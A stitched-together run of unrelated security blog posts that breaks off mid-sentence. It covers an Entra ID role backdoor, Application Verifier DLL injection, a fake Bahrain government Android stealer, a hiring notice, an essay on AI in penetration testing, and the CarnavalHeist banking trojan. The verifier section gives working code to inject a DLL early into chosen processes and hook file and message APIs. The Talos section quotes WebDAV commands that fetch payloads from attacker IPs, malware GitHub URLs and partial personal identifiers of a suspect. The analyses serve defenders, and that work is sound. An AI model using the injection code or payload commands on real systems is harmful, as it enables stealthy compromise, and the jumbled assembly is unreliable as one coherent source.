🕵️ Any unrecognized suspicious assignee must be investigated because it may be a potential backdoor. Does it look like a legitimate Entra Connect or Entra Cloud Sync service user? Does its creation date correspond to the set up date of hybrid synchronization? Etc. Tenable Identity Exposure will soon add an Indicator of Exposure (IoE) allowing automatic identification of those suspicious “Directory Synchronization Accounts” role assignments, including more detailed recommendations.

🛡️ As a safety net, you can also follow Dr. Nestori Syynimaa’s recommendation to create a Conditional Access policy to block all users with that role, except the real legitimate synchronization user.

🤞 Finally, I hope that Microsoft will soon find a solution, with a better user experience, that discourages use of the “Directory Synchronization Accounts” role without resorting to hiding it, so customers can use the Azure portal or Entra admin center to see the role and its assignees.


Stealthy Persistence with “Directory Synchronization Accounts” Role in Entra ID was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Building a Verifier DLL

The Application Verifier tool that is part of the Windows SDK provides a way to analyze processes for various types of misbehavior. The GUI provided looks like the following:

Application Verifier application window

To add an application, you can browse your file system and select an executable. The Application Verifier settings are based around the executable name only – not a full path. This is because verifier settings are stored in a subkey under Image File Execution Options with the name of the executable. For the notepad example above, you’ll find the following in the Registry:

Key for notepad.exe under the IFEO subkey

This IFEO subkey is used for NT Global Flags settings, one of which is using the Application Verifier. The GlobalFlag value is shown to be 0x100, which is the bit used for the verifier. Another way to set it without any extra information is using the GFlags tool, part of the Debugging Tools for Windows package:

GFlags tool

The Application Verifier lists a bunch of DLLs under the VerifierDlls value. Each one must be located in the system directory (e.g., c:\Windows\System32). Full paths are not supported; this is intentional, because the list of DLLs is going to be loaded into any process running the specified executable, and it would be risky to load DLLs from arbitrary locations in the file system. The system directory, as well as the IFEO key, are normally write-accessible by administrators only.
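For illustration, the same setup can be written by hand. Here is a minimal Python sketch (run elevated) of the registry values described above; the exact value type of VerifierDlls (REG_SZ vs. REG_MULTI_SZ) is an assumption on my part, so verify it against your system:

import winreg

# Enable Application Verifier for notepad.exe by hand, as the GUI/GFlags do.
IFEO = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"

with winreg.CreateKeyEx(winreg.HKEY_LOCAL_MACHINE, IFEO + r"\notepad.exe",
                        0, winreg.KEY_SET_VALUE) as key:
    # Bit 0x100 in GlobalFlag turns on the verifier for this image name
    winreg.SetValueEx(key, "GlobalFlag", 0, winreg.REG_DWORD, 0x100)
    # DLL name only - it must reside in the system directory; full paths are not supported
    winreg.SetValueEx(key, "VerifierDlls", 0, winreg.REG_SZ, "MyVerify.dll")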

The list of verifier DLLs is selected based on the set of tests selected by the user on the right hand side of the GUI. You’ll find subkeys that are used by the system-provided verifier DLLs with more settings related to the tests selected.

The nice thing about any verifier DLL specified is that these DLLs are loaded early in the process lifetime, by verifier.dll (itself loaded by NTDLL.dll), before any other DLLs are loaded into the process. Even attaching a debugger to the process while launching it would “miss” the loading of these DLLs.

This behavior makes this technique attractive for injecting a DLL into arbitrary processes. It’s even possible to enable Application Verifier globally and dynamically (without the need to restart the system), so that these DLLs are injected into all processes (except protected processes).

Writing a Verifier DLL

Describing the Application Verifier tests is not the focus of this post. Rather, we’ll look into what it takes to create such a DLL that can be injected early and automatically into processes of our choice. As we’ll see, it’s not just about mere injection. The verifier infrastructure (part of verifier.dll) provides convenient facilities to hook functions.

If we create a standard DLL, set up the verifier entries while adding our DLL to the list of verifier DLLs (possibly removing the “standard” ones), and try to run our target executable (say, notepad), we get the following nasty message box:

The process shuts down, which means that if a verifier DLL fails to be properly processed, the process terminates rather than “skipping” the DLL.

Launching notepad with WinDbg spits the following output:

ModLoad: 00007ff7`6dfa0000 00007ff7`6dfd8000   notepad.exe
ModLoad: 00007ffd`978f0000 00007ffd`97ae8000   ntdll.dll
ModLoad: 00007ffd`1f650000 00007ffd`1f6c4000   C:\Windows\System32\verifier.dll
Page heap: pid 0x10CEC: page heap enabled with flags 0x3.
AVRF: notepad.exe: pid 0x10CEC: flags 0x81643027: application verifier enabled
ModLoad: 00007ffc`cabd0000 00007ffc`cad6f000   C:\Windows\SYSTEM32\MyVerify.dll
ModLoad: 00007ffd`97650000 00007ffd`9770d000   C:\Windows\System32\KERNEL32.dll
ModLoad: 00007ffd`951b0000 00007ffd`954a6000   C:\Windows\System32\KERNELBASE.dll
AVRF: provider MyVerify.dll did not initialize correctly

Clearly the DLL did not initialize correctly, which is what the NTSTATUS 0xc0000142 was trying to tell us in the message box.

DLLs are initialized with the DllMain function that typically looks like this:

BOOL WINAPI DllMain(HMODULE hModule, DWORD reason, PVOID lpReserved) {
	switch (reason) {
		case DLL_PROCESS_ATTACH:
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
			break;
	}
	return TRUE;
}

The classic four values shown are used by the DLL to run code when it’s loaded into a process (DLL_PROCESS_ATTACH), unloaded from a process (DLL_PROCESS_DETACH), a thread is created in the process (DLL_THREAD_ATTACH), and a thread is exiting in the process (DLL_THREAD_DETACH). It turns out that there is a fifth value, which must be used with verifier DLLs:

#define DLL_PROCESS_VERIFIER 4

Returning TRUE from such a case is not nearly enough. Instead, a structure expected by the caller of DllMain must be initialized and its address written through lpReserved. The following structures and callback type definitions are needed:

typedef struct _RTL_VERIFIER_THUNK_DESCRIPTOR {
	PCHAR ThunkName;
	PVOID ThunkOldAddress;
	PVOID ThunkNewAddress;
} RTL_VERIFIER_THUNK_DESCRIPTOR, *PRTL_VERIFIER_THUNK_DESCRIPTOR;

typedef struct _RTL_VERIFIER_DLL_DESCRIPTOR {
	PWCHAR DllName;
	ULONG DllFlags;
	PVOID DllAddress;
	PRTL_VERIFIER_THUNK_DESCRIPTOR DllThunks;
} RTL_VERIFIER_DLL_DESCRIPTOR, *PRTL_VERIFIER_DLL_DESCRIPTOR;

typedef void (NTAPI* RTL_VERIFIER_DLL_LOAD_CALLBACK) (
	PWSTR DllName,
	PVOID DllBase,
	SIZE_T DllSize,
	PVOID Reserved);
typedef void (NTAPI* RTL_VERIFIER_DLL_UNLOAD_CALLBACK) (
	PWSTR DllName,
	PVOID DllBase,
	SIZE_T DllSize,
	PVOID Reserved);
typedef void (NTAPI* RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK) (
	PVOID AllocationBase,
	SIZE_T AllocationSize);

typedef struct _RTL_VERIFIER_PROVIDER_DESCRIPTOR {
	ULONG Length;
	PRTL_VERIFIER_DLL_DESCRIPTOR ProviderDlls;
	RTL_VERIFIER_DLL_LOAD_CALLBACK ProviderDllLoadCallback;
	RTL_VERIFIER_DLL_UNLOAD_CALLBACK ProviderDllUnloadCallback;

	PWSTR VerifierImage;
	ULONG VerifierFlags;
	ULONG VerifierDebug;

	PVOID RtlpGetStackTraceAddress;
	PVOID RtlpDebugPageHeapCreate;
	PVOID RtlpDebugPageHeapDestroy;

	RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK ProviderNtdllHeapFreeCallback;
} RTL_VERIFIER_PROVIDER_DESCRIPTOR;

That’s quite a list. The main structure is RTL_VERIFIER_PROVIDER_DESCRIPTOR, which has a pointer to an array of RTL_VERIFIER_DLL_DESCRIPTOR (the last element in the array must be all zeros), which in turn points to an array of RTL_VERIFIER_THUNK_DESCRIPTOR, used for specifying functions to hook. There are a few callbacks as well. At a minimum, we can define this descriptor like so (no hooking, no special code in callbacks):

RTL_VERIFIER_DLL_DESCRIPTOR noHooks{};

RTL_VERIFIER_PROVIDER_DESCRIPTOR desc = {
	sizeof(desc),
	&noHooks,
	[](auto, auto, auto, auto) {},
	[](auto, auto, auto, auto) {},
	nullptr, 0, 0,
	nullptr, nullptr, nullptr,
	[](auto, auto) {},
};

We can define these simply as global variables and return the address of desc in the handling of DLL_PROCESS_VERIFIER:

case DLL_PROCESS_VERIFIER:
	*(PVOID*)lpReserved = &desc;
	break;

With this code in place, we can try launching notepad again (after copying MyVerify.dll to the System32 directory). Here is the output from WinDbg:

ModLoad: 00007ff7`6dfa0000 00007ff7`6dfd8000   notepad.exe
ModLoad: 00007ffd`978f0000 00007ffd`97ae8000   ntdll.dll
ModLoad: 00007ffd`1f650000 00007ffd`1f6c4000   C:\Windows\System32\verifier.dll
Page heap: pid 0xB30C: page heap enabled with flags 0x3.
AVRF: notepad.exe: pid 0xB30C: flags 0x81643027: application verifier enabled
ModLoad: 00007ffd`25b50000 00007ffd`25cf1000   C:\Windows\SYSTEM32\MyVerify.dll
ModLoad: 00007ffd`97650000 00007ffd`9770d000   C:\Windows\System32\KERNEL32.dll
ModLoad: 00007ffd`951b0000 00007ffd`954a6000   C:\Windows\System32\KERNELBASE.dll
ModLoad: 00007ffd`963e0000 00007ffd`9640b000   C:\Windows\System32\GDI32.dll
ModLoad: 00007ffd`95790000 00007ffd`957b2000   C:\Windows\System32\win32u.dll
ModLoad: 00007ffd`95090000 00007ffd`951a7000   C:\Windows\System32\gdi32full.dll
...

This time it works. MyVerify.dll loads right after verifier.dll (which is the one managing verifier DLLs).

Hooking Functions

As mentioned before, we can use the verifier engine’s support for hooking functions in arbitrary DLLs. Let’s give this a try by hooking into a couple of functions, GetMessage and CreateFile. First, we need to set up the structures for the hooks on a per-DLL basis:

RTL_VERIFIER_THUNK_DESCRIPTOR user32Hooks[] = {
	{ (PCHAR)"GetMessageW", nullptr, HookGetMessage },
	{ nullptr, nullptr, nullptr },
};

RTL_VERIFIER_THUNK_DESCRIPTOR kernelbaseHooks[] = {
	{ (PCHAR)"CreateFileW", nullptr, HookCreateFile },
	{ nullptr, nullptr, nullptr },
};

The second NULL in each triplet is where the original address of the hooked function is stored by the verifier engine. Now we fill the structure with the list of DLLs, pointing to the hook arrays:

RTL_VERIFIER_DLL_DESCRIPTOR dlls[] = {
	{ (PWCHAR)L"user32.dll", 0, nullptr, user32Hooks },
	{ (PWCHAR)L"kernelbase.dll", 0, nullptr, kernelbaseHooks },
	{ nullptr, 0, nullptr, nullptr },
};

Finally, we update the main structure with the dlls array:

RTL_VERIFIER_PROVIDER_DESCRIPTOR desc = {
	sizeof(desc),
	dlls,
	[](auto, auto, auto, auto) {},
	[](auto, auto, auto, auto) {},
	nullptr, 0, 0,
	nullptr, nullptr, nullptr,
	[](auto, auto) {},
};

The last thing is to actually implement the hooks:

BOOL WINAPI HookGetMessage(PMSG msg, HWND hWnd, UINT filterMin, UINT filterMax) {
	// get original function
	static const auto orgGetMessage = (decltype(::GetMessageW)*)user32Hooks[0].ThunkOldAddress;
	auto result = orgGetMessage(msg, hWnd, filterMin, filterMax);
	char text[128];
	sprintf_s(text, "Received message 0x%X for hWnd 0x%p\n", msg->message, msg->hwnd);
	OutputDebugStringA(text);
	return result;
}

HANDLE WINAPI HookCreateFile(PCWSTR path, DWORD access, DWORD share, LPSECURITY_ATTRIBUTES sa, DWORD cd, DWORD flags, HANDLE hTemplate) {
	// get original function
	static const auto orgCreateFile = (decltype(::CreateFileW)*)kernelbaseHooks[0].ThunkOldAddress;
	auto hFile = orgCreateFile(path, access, share, sa, cd, flags, hTemplate);
	char text[512];
	if (hFile == INVALID_HANDLE_VALUE)
		sprintf_s(text, "Failed to open file %ws (%u)\n", path, ::GetLastError());
	else
		sprintf_s(text, "Opened file %ws successfuly (0x%p)\n", path, hFile);

	OutputDebugStringA(text);
	return hFile;
}

The hooks just send some output with OutputDebugString. Here is an excerpt output when running notepad under a debugger:

ModLoad: 00007ff7`6dfa0000 00007ff7`6dfd8000   notepad.exe
ModLoad: 00007ffd`978f0000 00007ffd`97ae8000   ntdll.dll
ModLoad: 00007ffd`1f650000 00007ffd`1f6c4000   C:\Windows\System32\verifier.dll
Page heap: pid 0xEF18: page heap enabled with flags 0x3.
AVRF: notepad.exe: pid 0xEF18: flags 0x81643027: application verifier enabled
ModLoad: 00007ffd`25b80000 00007ffd`25d24000   C:\Windows\SYSTEM32\MyVerify.dll
ModLoad: 00007ffd`97650000 00007ffd`9770d000   C:\Windows\System32\KERNEL32.dll
ModLoad: 00007ffd`951b0000 00007ffd`954a6000   C:\Windows\System32\KERNELBASE.dll
ModLoad: 00007ffd`963e0000 00007ffd`9640b000   C:\Windows\System32\GDI32.dll
ModLoad: 00007ffd`95790000 00007ffd`957b2000   C:\Windows\System32\win32u.dll
ModLoad: 00007ffd`95090000 00007ffd`951a7000   C:\Windows\System32\gdi32full.dll
...
ModLoad: 00007ffd`964f0000 00007ffd`965bd000   C:\Windows\System32\OLEAUT32.dll
ModLoad: 00007ffd`96d10000 00007ffd`96d65000   C:\Windows\System32\shlwapi.dll
ModLoad: 00007ffd`965d0000 00007ffd`966e4000   C:\Windows\System32\MSCTF.dll
Opened file C:\Windows\Fonts\staticcache.dat successfuly (0x0000000000000164)
ModLoad: 00007ffd`7eac0000 00007ffd`7eb6c000   C:\Windows\System32\TextShaping.dll
ModLoad: 00007ffc`ed750000 00007ffc`ed82e000   C:\Windows\System32\efswrt.dll
ModLoad: 00007ffd`90880000 00007ffd`909d7000   C:\Windows\SYSTEM32\wintypes.dll
ModLoad: 00007ffd`8bf90000 00007ffd`8bfad000   C:\Windows\System32\MPR.dll
ModLoad: 00007ffd`8cae0000 00007ffd`8cce3000   C:\Windows\System32\twinapi.appcore.dll
Opened file C:\Windows\Registration\R000000000025.clb successfuly (0x00000000000001C4)
ModLoad: 00007ffd`823b0000 00007ffd`82416000   C:\Windows\System32\oleacc.dll
...
Received message 0x31F for hWnd 0x00000000001F1776
Received message 0xC17C for hWnd 0x00000000001F1776
Received message 0xF for hWnd 0x00000000001F1776
Received message 0xF for hWnd 0x00000000003010C0
Received message 0xF for hWnd 0x0000000000182E7A
Received message 0x113 for hWnd 0x00000000003319A8
...
ModLoad: 00007ffd`80e20000 00007ffd`80fd4000   C:\Windows\System32\WindowsCodecs.dll
ModLoad: 00007ffd`94ee0000 00007ffd`94f04000   C:\Windows\System32\profapi.dll
Opened file C:\Users\Pavel\AppData\Local\IconCache.db successfuly (0x0000000000000724)
ModLoad: 00007ffd`3e190000 00007ffd`3e1f6000   C:\Windows\System32\thumbcache.dll
Opened file C:\Users\Pavel\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db successfuly (0x0000000000000450)
Opened file C:\Users\Pavel\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db successfuly (0x000000000000065C)
ModLoad: 00007ffd`90280000 00007ffd`90321000   C:\Windows\SYSTEM32\policymanager.dll

This application verifier technique is an interesting one, and fairly easy to use. The full example can be found at https://github.com/zodiacon/VerifierDLL.

Happy verifying!

Fake Bahrain Government Android App Steals Personal Data Used for Financial Fraud

Authored by Dexter Shin

Many government agencies provide their services online for the convenience of their citizens, and providing a service through a mobile app makes it even more convenient and accessible. But what happens when malware pretends to be these services?

McAfee Mobile Research Team found InfoStealer Android malware pretending to be a government agency service in Bahrain. The malware pretends to be the official app of Bahrain and advertises that users can renew or apply for driver’s licenses, visas, and ID cards on mobile. Users deceived by these advertisements unhesitatingly provide the personal information required for these services. The malware reaches users in various ways, including Facebook and SMS messages, and users who are not familiar with these attacks easily make the mistake of handing over their personal information.

Detailed pretended app

In Bahrain, there’s a government agency called the Labour Market Regulatory Authority (LMRA). This agency operates with full financial and administrative independence under the guidance of a board of directors chaired by the Minister of Labour. It provides a variety of mobile services, and most apps provide only one service per app. However, this fake app advertises more than one service.

Figure 1. Legitimate official LMRA website

Figure 2. Fake app named LMRA

Beyond the most frequently found fake apps impersonating LMRA, there are various fake apps impersonating the Bank of Bahrain and Kuwait (BBK), BenefitPay (a fintech company in Bahrain), and even apps claiming to be related to Bitcoin or loans. These apps use the same techniques as the fake LMRA apps to steal personal information.

Figure 3. Various fake apps using the same techniques

From the types of apps this malware impersonates, we can infer that its purpose is financial fraud using the stolen personal information. Moreover, people have already been affected by this campaign, as shown in the picture below.

Figure 4. Victims of financial fraud (Source: Reddit)

Distribution method

They distribute these apps using Facebook pages and SMS messages. The Facebook pages are fake, and the malware author is constantly creating new ones. These pages direct users to phishing sites, either WordPress blog sites or custom sites designed to download apps.

Figure 5. Facebook profile and page with a link to the phishing site

Figure 6. One of the phishing sites designed to download app

In the case of SMS, social engineering messages create a sense of urgency to trick users into clicking a link.

Figure 7. Phishing message using SMS (Source: Reddit)

What they want

When the user launches the app, it shows a large copy of the legitimate icon to mislead users, and asks for their CPR and phone number. The CPR is a unique 9-digit identifier given to each resident of Bahrain. There is a “Verify” button, but it simply sends the information to the C2 server: whatever users input, the app goes directly to the next screen without any verification. This step just stores the information for the next step.

Figure 8. The first screen (left) and next screen of a fake app (right)

There are various menus, but they are all linked to the same URL. The parameter values are the CPR and phone number entered by the user on the first screen.

Figure 9. All menus are linked to the same URL

The last page asks for the user’s full name, email, and date of birth. After the user fills in everything and clicks the “Send” button, all the information entered so far is sent to the malware author’s C2 server.

Figure 10. All data sent to C2 server

After sending, it shows a completion page to trick the user, with a message saying you will receive an email within 24 hours. But the timer is just a counter that decreases automatically; nothing happens after 24 hours. In other words, while users wait 24 hours for a confirmation email, cybercriminals exploit the stolen information to steal the victims’ financial assets.

Figure 11. Completion page to trick users

In addition, the app has a payload for stealing SMS messages: a receiver that runs whenever an SMS is received. As soon as an SMS arrives, the app forwards it to the C2 server without notifying the user.

Figure 12. Payload for stealing SMS

Dynamic loading of phishing sites via Firebase

We confirmed that there are two types of these apps: one type implements a custom C2 server and receives data directly through a web API, and the other uses Firebase. Firebase is a backend service platform provided by Google. Among its many services, Firestore can store data as a database, and this malware uses Firestore. Because it is a legitimate service provided by Google, it is difficult to detect as a malicious URL.

Apps that use Firebase dynamically load phishing URLs stored in Firestore. Therefore, even if a phishing site is blocked, the attacker can respond quickly and keep already-infected victims active simply by changing the URL stored in Firestore.

Figure 13. Dynamically loading phishing site loaded in webview
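As a rough sketch of the concept (the project ID, document path, and field name below are placeholders, not the malware's actual values), fetching a URL for a WebView from Firestore over its public REST API can be as simple as:

import requests

# Read a single Firestore document through the public REST API and pull a
# URL field out of it - the same "remote config" pattern described above.
PROJECT = "example-project-id"   # placeholder
DOC_PATH = "config/phishing"     # placeholder collection/document

resp = requests.get(
    f"https://firestore.googleapis.com/v1/projects/{PROJECT}"
    f"/databases/(default)/documents/{DOC_PATH}"
)
doc = resp.json()
phishing_url = doc["fields"]["url"]["stringValue"]  # hypothetical field name
print(phishing_url)  # this is what would be loaded into the WebView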

Conclusion

According to our detection telemetry data, 62 users in Bahrain have already used this app. Since this is the count at the time of writing, the number is expected to keep increasing, considering that new Facebook pages are still being actively created.

Recent malware tends to target specific countries or users rather than rely on widespread attacks. These attacks may be difficult for general users to spot because the malware accurately mimics the services that users living in a specific country need. So we recommend users install security software to protect their devices. Also, users are encouraged to download and use apps from official app stores like the Google Play Store or Apple App Store. If you can’t find an app in these stores, you should only download the app provided on the official website.

McAfee Mobile Security already detects this threat as Android/InfoStealer. For more information, visit McAfee Mobile Security.

Indicators of Compromise (IOCs)

Samples:

SHA256 Package Name App Name
6f6d86e60814ad7c86949b7b5c212b83ab0c4da65f0a105693c48d9b5798136c com.ariashirazi.instabrowser LMRA
5574c98c9df202ec7799c3feb87c374310fa49a99838e68eb43f5c08ca08392d com.npra.bahrain.five LMRA Bahrain
b7424354c356561811e6af9d8f4f4e5b0bf6dfe8ad9d57f4c4e13b6c4eaccafb com.npra.bahrain.five LMRA Bahrain
f9bdeca0e2057b0e334c849ff918bdbe49abd1056a285fed1239c9948040496a com.lmra.nine.lmranine LMRA
bf22b5dfc369758b655dda8ae5d642c205bb192bbcc3a03ce654e6977e6df730 com.stich.inches Visa Update
8c8ffc01e6466a3e02a4842053aa872119adf8d48fd9acd686213e158a8377ba com.ariashirazi.instabrowser EasyLoan
164fafa8a48575973eee3a33ee9434ea07bd48e18aa360a979cc7fb16a0da819 com.ariashirazi.instabrowser BTC Flasher
94959b8c811fdcfae7c40778811a2fcc4c84fbdb8cde483abd1af9431fc84b44 com.ariashirazi.instabrowser BenefitPay
d4d0b7660e90be081979bfbc27bbf70d182ff1accd829300255cae0cb10fe546 com.lymors.lulumoney BBK Loan App

Domains:

  • https[://]lmraa.com
  • https[://]lmjbfv.site
  • https[://]dbjiud.site
  • https[://]a.jobshuntt.com
  • https[://]shop.wecarerelief.ca

Firebase(for C2):

  • https[://]npra-5.firebaseio.com
  • https[://]lmra9-38b17.firebaseio.com
  • https[://]practice-8e048.firebaseio.com

The post Fake Bahrain Government Android App Steals Personal Data Used for Financial Fraud appeared first on McAfee Blog.

Hacking the Future: 12 Years at Exodus and the Next Big Leap

Hacking the Future: 12 Years at Exodus and the Next Big Leap

Tl;dr – We are hiring engineers, analysts, and researchers.

This May marked our 12th year of producing world-class vulnerability intelligence at Exodus Intelligence. We have had many ups (and downs) and have worked with a variety of talented people over the years whose collective contributions have made us who we are today. Throughout our history we have stayed true to our founding mission of maintaining a hacking culture, made by hackers, for hackers. We challenge and pride ourselves on researching some of the hardest targets, across a diversity of platforms and operating systems. As a team we have analyzed (I’m talking weeks-long, thorough, root cause analysis) more than 1,600 N-days, and discovered over 400 0-days in enterprise products. Whether software, hardware, server side, client side, IoT… our experts have done it all.

It has been a bit of a waiting game for the industry to build an appreciation for vulnerability intelligence, let alone zero-day vulnerability intelligence. I would argue that the industry is finally there, and with the help of a lot of the big companies, there are products that can effectively detect and defend against this category of risks.

There is still a degree of “wild west” in the industry, where it is hard to design and maintain standards for reporting, tracking and cataloging vulnerabilities (CVE, CVSS, CNAs, CPEs, SBOM, …). At Exodus we have always focused on the core research as our wheelhouse and put less effort into the website, front end, and engineering work that drives how people view, search and ingest our data. The market demands it now.

We are at an inflection point and aim to make our data more widely available and develop what tools we can to aggregate, enrich and curate all the public data, marry it with our own discoveries and analysis, and distribute it to our customers. We have developed integrations for Splunk, Demisto (Cortex XSOAR), Slack, and Recorded Future, to name a few examples, but the engineering lift is large, and the research support required is immense. Even as we jump on the GenAI bandwagon with everyone else and invest in LLMs, ML and AI, that technology is only as good as its input/data, so our researchers will need to spend the requisite time and effort training these models.

Now to the point of this post: we are hiring. We are looking for engineers with a special motivation to understand these challenges and a passion to build solutions that chip away at the problems. We intend to make some of this tooling, code, and data available to the public, so the engineers we bring onboard should have an appreciation for open source code. While we’re always looking for elite researchers to join the team, these engineering efforts will soon unlock the need for an army of analysts interested in coverage of public data an inch deep and a mile wide. We will have the incentives and mentorship in place to refine and develop skills towards hacking more difficult targets and research but, for the first time, we will be opening our doors to entry-level analysts with the motivation to learn and gain unparalleled experience in the world of vulnerability research.

Current openings include:

  • Full-Stack Software Engineer
  • Web Browser Vulnerability Researcher
  • Mobile Vulnerability Researcher
  • Zero-Day Vulnerability Researcher
  • N-Day Vulnerability Researcher

Please apply at our careers page

The post Hacking the Future: 12 Years at Exodus and the Next Big Leap appeared first on Exodus Intelligence.

Why AI Will Not Fully Replace Humans for Web Penetration Testing

Written by: Steven van der Baan

In the ever-evolving landscape of cybersecurity, the integration of artificial intelligence (AI) has revolutionized various aspects of threat detection, prevention, and mitigation. Web penetration testing, a crucial component of ensuring the security posture of digital assets, has seen significant advancements through AI-powered tools. While AI undoubtedly offers numerous benefits in this domain, it’s essential to recognize that it cannot entirely replace human expertise and intuition. In this article, we explore the reasons why AI will not fully replace humans for web penetration testing.

AI excels in handling immense data volumes while recognizing patterns. However, it typically lacks the contextual understanding that human testers possess. Web applications function within specific business contexts, and vulnerabilities may manifest differently based on various factors such as industry, user behaviour, and regulatory requirements. Human testers can interpret these nuances and prioritize findings based on their potential impact on the organization’s objectives.

One of the fundamental challenges in cybersecurity is staying ahead of adversaries who continually innovate and devise new attack techniques. Although AI algorithms can detect known vulnerabilities efficiently, they may struggle to adapt to novel attack vectors or zero-day exploits. Human penetration testers bring creativity to the table, utilizing their experience and intuition to think like attackers and uncover unexpected vulnerabilities that automated tools might miss.

Certain categories of vulnerabilities, such as logical flaws or business logic errors, often require human intervention to identify accurately. These vulnerabilities may not be easily detectable through automated scanning alone, as they involve understanding the underlying logic of the application and its intended functionality. Human testers can replicate real-world scenarios and apply sophisticated techniques to uncover subtle security weaknesses that AI might overlook.

AI-powered tools for web penetration testing are prone to generating false positives (incorrectly identifying vulnerabilities that do not exist) and false negatives (overlooking actual vulnerabilities). Although advancements in machine learning have improved accuracy, eliminating both false positives and false negatives remains a significant challenge. Human testers play an essential role in validating automated findings, minimizing false alarms, and providing valuable insights into the context of each vulnerability.

The ethical and legal implications of automated penetration testing must be carefully considered. AI-powered tools may generate substantial volumes of traffic and potentially disrupt web applications, leading to unintended consequences or violations of terms of service. Furthermore, utilizing automated tools without proper authorization can result in legal repercussions. Human testers exercise judgment, ensuring that tests are conducted responsibly, with appropriate permissions and adherence to ethical guidelines.

While AI has revolutionized web penetration testing by automating routine tasks, detecting known vulnerabilities, and enhancing efficiency, it cannot replace the critical thinking, intuition, and creativity of human testers. The synergy between AI and human expertise is essential for conducting comprehensive and effective security assessments. By leveraging the strengths of both AI-powered tools and human testers, organizations can achieve a more robust and adaptive approach to web application security.

New banking trojan “CarnavalHeist” targets Brazil with overlay attacks

  • Since February 2024, Cisco Talos has been observing an active campaign targeting Brazilian users with a new banking trojan called “CarnavalHeist.” Many of the observed tactics, techniques and procedures (TTPs) are common among other banking trojans coming out of Brazil. This family has also been referenced as AllaSenha in a recent report. 
  • Talos attributes with high confidence the development and operation of CarnavalHeist to Brazilian actors who could be identified because of some operational mistakes made during the domain registration process for their payload-hosting sites. 
  • The current campaign uses financial-related themes in spam emails, Delphi-based DLLs, overlay attack methods, and usual input capture techniques, such as keylogging and screen capture. There are also names of traditional Brazilian banks hardcoded in the malware.  
  • Unique to CarnavalHeist, however, is the dynamic use of a Python-based loader as part of the DLL injection process and the specific targeting of banking desktop applications to enable tracking of other Brazilian financial institutions. 

CarnavalHeist has Brazilian origins 


Talos assesses with high confidence that the CarnavalHeist malware is of Brazilian origin and primarily targets Brazilian users. This assessment is based on our observation of the Portuguese language throughout all aspects of the infection chain and the malware itself, including the use of Brazilian slang to describe some bank names, and a notable lack of other language variants thus far. The command and control (C2) infrastructure exclusively uses the BrazilSouth availability zone on Microsoft Azure to control infected machines, and the actors specifically target prominent Brazilian financial institutions.

We further assess that the current wave of activity has been ongoing since the beginning of February based on the volume and timeline of observable C2 domain activity, although we have observed related samples and variants that were uploaded to VirusTotal in November and December 2023, indicating that the malware has been in development since at least late 2023. As of May 2024, CarnavalHeist is still active, and our analysis remains ongoing as we continue to identify new samples. 

Financial-themed spam as initial execution method 

CarnavalHeist infection begins with a financially themed unsolicited email using a fake invoice as a lure to get the user to open a malicious URL. 

An example unsolicited email distributing CarnavalHeist.

The malicious link uses the IS.GD URL shortener service to redirect users to the first-stage payload. The URL usually looks similar to some of these examples: 

  • https://is[.]gd/38qeon?0177551.5510 
  • https://is[.]gd/ROnj3W?0808482.5176 
  • https://is[.]gd/a4dpQP?000324780473.85375532000 

This URL redirects the user to the server hosting the fake web page where the users are supposed to download their invoice. We have observed different domains being used in this step, but all contain references to “Nota Fiscal Eletrônica,” the Portuguese term for an electronic invoice.

Content of website where user is redirected to download the malware

Some of the domains we observed being used to host these pages are: 

  • https://notafiscaleletronica[.]nf-e[.]pro/danfe/?notafiscal=00510242.500611 
  • https://nota-fiscal[.]nfe-digital[.]top/nota-estadual/?notafiscal=00792011.977347 
  • https://nfe-visualizer[.]app[.]br/notas/?notafiscal=000851113082.35493424000 

The download target is the final link in this step, and it uses WebDAV to download the next-stage payload: 

  • search:query=NotaFiscal.pdf&crumb=location:\\4[.]203[.]105[.]118@80\Documentos&displayname=Downloads 
  • search:query=NotaFiscal.pdf&crumb=location:\\191[.]233[.]248[.]170@80\Documentos&displayname=Downloads 

This command ends up downloading a LNK file, which then executes the next stage of the infection. The LNK file’s metadata illustrates a common method threat actors use to execute malicious scripts and commands. 

LNK metadata used in the CarnavalHeist campaign.

The command above attempts to hide the malicious execution from the unsuspecting user. First, the text “Visualizacao indisponivel” (Portuguese for “view unavailable”) is written to a file, “NotaFiscal.pdf,” to the user’s Downloads directory. The PDF is then opened for viewing, meant to fool the user into thinking an actual PDF was downloaded, while another cmd.exe process is started minimized, and the malicious component is run.  

We have also observed multiple MSI installer-based variants, whereby the MSI file replaces the role of the LNK file and subsequent batch file, picking up the execution chain with a variant of the first-stage Python script. In many of the earlier variants, the actor’s Python scripts were less refined: they used lower-level C types and a more obvious invocation of “windll.kernel32” directly in the Python script to dynamically load downstream malicious DLLs, rather than the more obfuscated tooling offered by the “pythonmemorymodule” package seen in the execution chain of the newer samples.

Identifying the actors behind CarnavalHeist 

Our analysis of the different CarnavalHeist samples has exposed the user account used on the system where some of the samples were compiled, in addition to a GitHub account referenced in the MSI variants that appears to have hosted the loader and banking trojan payloads at one point.

In examining the final payload, an assert statement within the code was flagged by the compiler and project metadata was exposed as a result. The assert we observed exposed the directory path “C:\Users\bert1m\Desktop\Meu Drive”, with “bert1m” being the active username during the payload’s compilation. The MSI variant also refers to a GitHub account “marianaxx0492494,” which was being used as a remote host for the files: 

  • github[.]com/marianaxx0492494/update/raw/main/setup.msi 
  • github[.]com/marianaxx0492494/update/raw/main/Execute_dll.zip 

These were presumably a copy of the MSI variant itself as well as a version of the loader DLL. However, at the time of our investigation, this user account had already been removed from GitHub, and we could not find verified samples of the files at those URLs.

While this evidence by itself is not enough to identify specific actors, we found additional evidence of the actors’ identity behind the development and operation of this malware campaign. While examining the WHOIS information for one of the domains hosting the initial infection, we noticed it exposed the full name and email address of the person registering the domain.  

Whois information for domain nfe-visualizer[.]app[.]br used to distribute CarnavalHeist.

We can see that the username in their email address is similar to the username used in the project path we observed inside the binary. Another important piece of information in this registration is the `ownerid`, which contains the CPF (“Cadastro de Pessoa Física” or “Natural Person Registry”) of the person. The CPF works as a national ID in Brazil.

By searching for this person’s name, we found a reference to a company where they were a partner, which lists part of their CPF:

Business association information for a company in Brazil showing part of the threat actor CPF.

We also found previous companies they owned in the Brazilian state of Maranhão: 

